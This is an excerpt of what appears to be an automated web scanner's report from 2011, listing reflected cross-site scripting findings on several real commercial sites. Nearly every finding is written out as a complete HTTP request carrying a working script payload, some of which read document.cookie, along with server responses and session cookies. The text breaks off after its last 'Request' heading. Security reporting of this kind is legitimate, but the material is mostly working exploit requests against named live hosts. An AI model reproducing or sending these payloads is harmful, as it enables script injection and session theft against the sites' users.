The value of the pairs request parameter is copied into an HTML comment. The payload a51bb--><script>alert(1)</script>b772c65691c was submitted in the pairs parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=a51bb--><script>alert(1)</script>b772c65691c&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pairs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1837"><script>alert(1)</script>5046a7dd34d was submitted in the pairs parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHFa1837"><script>alert(1)</script>5046a7dd34d&zone_id=4129 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the zone_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b8d"%3balert(1)//289c9475d9c was submitted in the zone_id parameter. This input was echoed as b6b8d";alert(1)//289c9475d9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129b6b8d"%3balert(1)//289c9475d9c HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the zone_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef6d3"><script>alert(1)</script>4530cb81810 was submitted in the zone_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframe5.php?css=http://www.forexyard.com/en/css/quotes-chart.css&img_prefix=35_30min&pairs=EURUSD,USDJPY,AUDUSD,USDCAD,GBPUSD,USDCHF&zone_id=4129ef6d3"><script>alert(1)</script>4530cb81810 HTTP/1.1 Host: quotes.forexyard.com Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 121ed<script>alert(1)</script>8c175286485 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1296944121644.0?callback=INFOLINKS.gsdCallback121ed<script>alert(1)</script>8c175286485&pid=112737&wsid=0&pdom=www.scare666.com&jsv=209 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.scare666.com/news/gambar6823d%3Cscript%3Ealert(document.cookie)%3C/script%3E3f01d4d8a23 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset=UTF-8 Content-Length: 184 Date: Sat, 05 Feb 2011 22:35:02 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b7a06<script>alert(1)</script>9e0d94a54f4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1296944132032.0?callback=INFOLINKS.gsdCallbackb7a06<script>alert(1)</script>9e0d94a54f4&pid=112737&wsid=0&pdom=www.scare666.com&jsv=209.1 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.scare666.com/news/gambar6823d%3Cscript%3Ealert(document.cookie)%3C/script%3E3f01d4d8a23 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset=UTF-8 Content-Length: 186 Date: Sat, 05 Feb 2011 22:35:10 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a702b<script>alert(1)</script>e020ac7d6aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1296944168552.0?callback=INFOLINKS.gsdCallbacka702b<script>alert(1)</script>e020ac7d6aa&pid=112737&wsid=0&pdom=www.scare666.com&jsv=209.1 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.scare666.com/news/gambar6823d%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3f01d4d8a23 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset=UTF-8 Content-Length: 186 Date: Sat, 05 Feb 2011 22:35:19 GMT Connection: close
The value of the fuid request parameter is copied into the HTML document as plain text between tags. The payload 87eb5<script>alert(1)</script>139bdf357156264fe was submitted in the fuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944169071.1&twnum=8&rts=1296944169071&crtss=30&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b639287eb5<script>alert(1)</script>139bdf357156264fe&rid=&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=46404459464e4459454643594543445846454e414e4343454141424f475869707271&pid=112737&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&crt=1&csilv=3%2E0%2E50611%2E0&crtwa=728&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 7b8d9<script>alert(1)</script>1b63b6cceb51a55a4 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944169071.1&twnum=8&rts=1296944169071&crtss=30&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b6392&rid=7b8d9<script>alert(1)</script>1b63b6cceb51a55a4&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=46404459464e4459454643594543445846454e414e4343454141424f475869707271&pid=112737&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&crt=1&csilv=3%2E0%2E50611%2E0&crtwa=728&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
The value of the fuid request parameter is copied into the HTML document as plain text between tags. The payload beb51<script>alert(1)</script>e720329519ecd3420 was submitted in the fuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944132135.1&twnum=8&rts=1296944132136&crt=1&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b6392beb51<script>alert(1)</script>e720329519ecd3420&rid=&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=4345415c434b415c4043465c4046415d43404b444b4646404142424a465d69747274&csilv=3%2E0%2E50611%2E0&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&pid=112737&crtwa=728&crtss=30&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload ff64d<script>alert(1)</script>4f721153ea292428 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944132135.1&twnum=8&rts=1296944132136&crt=1&rcate=&anow=&fuid=11d77bcd%2D1e56%2D4ec4%2D8f17%2D60b91b3b6392&rid=ff64d<script>alert(1)</script>4f721153ea292428&wsid=0&ref=burp&pdom=www%2Escare666%2Ecom&refq=&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&rh=&page%5Fkeyw=&by=f&makey=4345415c434b415c4043465c4046415d43404b444b4646404142424a465d69747274&csilv=3%2E0%2E50611%2E0&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&ms=81&jsv=209%2E1&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&crtw=728&pid=112737&crtwa=728&crtss=30&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
The value of the fuid request parameter is copied into the HTML document as plain text between tags. The payload 62e7f<script>alert(1)</script>b664e74e90dbc44a3 was submitted in the fuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944122040.1&crtwa=728&twnum=8&rts=1296944122041&crtss=30&rcate=&anow=&crt=1&rid=&ref=burp&fuid=62e7f<script>alert(1)</script>b664e74e90dbc44a3&refq=&rh=&wsid=0&by=f&pdom=www%2Escare666%2Ecom&csilv=3%2E0%2E50611%2E0&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&page%5Fkeyw=&ms=81&jsv=209&makey=4244405d424a405d4142475d4147405c42414a454a474741424a4440415c69767476&crtw=728&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&pid=112737&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 3984a<script>alert(1)</script>d2b79777ae4b361b6 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /action/doq.htm?pcode=utf-8&r=1296944122040.1&crtwa=728&twnum=8&rts=1296944122041&crtss=30&rcate=&anow=&crt=1&rid=3984a<script>alert(1)</script>d2b79777ae4b361b6&ref=burp&fuid=&refq=&rh=&wsid=0&by=f&pdom=www%2Escare666%2Ecom&csilv=3%2E0%2E50611%2E0&ptxt=just%20about%20news%7Cfree%20tattoo%20designs%20downloads%20on&page%5Fkeyw=&ms=81&jsv=209&makey=4244405d424a405d4142475d4147405c42414a454a474741424a4440415c69767476&crtw=728&purl=http%3A%2F%2Fwww%2Escare666%2Ecom%2Fnews%2Fgambar6823d%253Cscript%253Ealert%28document%2Ecookie%29%253C%2Fscript%253E3f01d4d8a23&pid=112737&ptitle=Gambar6823d%3Cscript%3Ealert%28document%2Ecookie%29%3C%2Fscript%3E3f01d4d8a23%20%2D%20scare666%2Ecom&v=2%2Em%2D36019%2Eh%2D36019 HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69e60<img%20src%3da%20onerror%3dalert(1)>cf07a33562d was submitted in the REST URL parameter 1. This input was echoed as 69e60<img src=a onerror=alert(1)>cf07a33562d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0305l69e60<img%20src%3da%20onerror%3dalert(1)>cf07a33562d/mywebex/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Date: Sat, 05 Feb 2011 22:59:37 GMT Server: Apache Content-Length: 95 Set-Cookie: JSESSIONID=wQpnNNWZKGkD3Fvy49My16T2f673R4kb13PtRhvHQXP9pNvnv9Wf!1468971393; path=/ Connection: close Content-Type: text/html
Invalid path /mw0305l69e60<img src=a onerror=alert(1)>cf07a33562d/mywebex/default was requested
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b499<img%20src%3da%20onerror%3dalert(1)>ba126beb79a was submitted in the REST URL parameter 2. This input was echoed as 9b499<img src=a onerror=alert(1)>ba126beb79a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mw0305l/mywebex9b499<img%20src%3da%20onerror%3dalert(1)>ba126beb79a/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Date: Sat, 05 Feb 2011 22:59:42 GMT Server: Apache Content-Length: 87 Set-Cookie: JSESSIONID=lBlLNNWp45qdNzBYc0nS9jJpHfhnZFPGkGvDDwhn6N4WtDrncRft!88149066; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html
Invalid path /mywebex9b499<img src=a onerror=alert(1)>ba126beb79a/default was requested
The value of the 1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a53c"><script>alert(1)</script>00b06087c8 was submitted in the 1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:43 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 74738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web ...[SNIP]... <a href="/account:login/?return_to=/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=13a53c"><script>alert(1)</script>00b06087c8"> ...[SNIP]...
4.163. http://splunkbase.splunk.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://splunkbase.splunk.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ffc5"><script>alert(1)</script>46cc332d1dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1ffc5"><script>alert(1)</script>46cc332d1dc=1 HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c71"><script>alert(1)</script>af5883db310 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the redir request parameter is copied into the HTML document as plain text between tags. The payload c742e<script>alert(1)</script>f002713d5a3 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7402b"><script>alert(1)</script>8ee62d23cd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps7402b"><script>alert(1)</script>8ee62d23cd0/All/4.x/ HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:01:59 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4529 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web3 ...[SNIP]... <a href="/account:login/?return_to=/apps7402b"><script>alert(1)</script>8ee62d23cd0/All/4.x/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1abb1"><script>alert(1)</script>a34c6b70f00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apps/All1abb1"><script>alert(1)</script>a34c6b70f00/4.x/ HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 23:02:04 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4529 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web4 ...[SNIP]... <a href="/account:login/?return_to=/apps/All1abb1"><script>alert(1)</script>a34c6b70f00/4.x/"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d256"><script>alert(1)</script>57ae3520054 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
